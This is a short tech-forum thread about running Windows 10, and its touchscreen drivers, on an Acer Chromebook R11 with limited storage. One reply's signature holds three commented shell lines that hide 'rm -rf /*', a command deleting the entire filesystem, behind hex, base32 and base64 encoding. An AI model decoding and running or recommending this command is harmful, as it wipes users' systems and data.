Touchscreen Compatibility on Windows 10

Hello

So I have an Acer Chromebook R11 lying around with Chrome OS on it (obviously). I was wondering if I installed Windows 10 on it using the various online guides, if the touchscreen functionality would still work. Does Windows have the necessary drivers or are there drivers that can be intsalled for this specific model?

Or are there other ways in which i could get windows 10 software to run natively?

Many thanks

Your main issue lies with 16GB of on-board storage that thing has. Touchscreen would probably work only if you can fit windows 10 to 16GB of storage.

mY sYsTeM iS Not pErfoRmInG aS gOOd As I sAW oN yOuTuBe. WhA t IS a GoOd FaN CuRVe??!!? wHat aRe tEh GoOd OvERclok SeTTinGS FoR My CaRd??  HoW CaN I foRcE my GpU to uSe 1o0%? BuT WiLL i HaVE Bo0tllEnEcKs? RyZEN dOeS NoT peRfORm BetTer wItH HiGhER sPEED RaM!!dId i WiN teH SiLiCON LotTerrYyOu ShoUlD dEsHrOuD uR GPUmy SYstEm iS UNDerPerforMiNg iN WarzONEcan mY Pc Run WiNdOwS 11 ?woUld BaKInG MY GRaPHics card fIX it? MultimETeR TeSTiNG!! aMd'S GpU DrIvErS aRe as goOD aS NviDia's YOU SHoUlD oVERCloCk yOUR ramS To 5000C18

You would most likely not be able to install windows 10 since windows will need at least 60GB of drive space to install onto.

# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)

4 hours ago, Levent said:

Your main issue lies with 16GB of on-board storage that thing has. Touchscreen would probably work only if you can fit windows 10 to 16GB of storage.

Thanks, though my specific model at least has 32GB but yeah probably still not enough.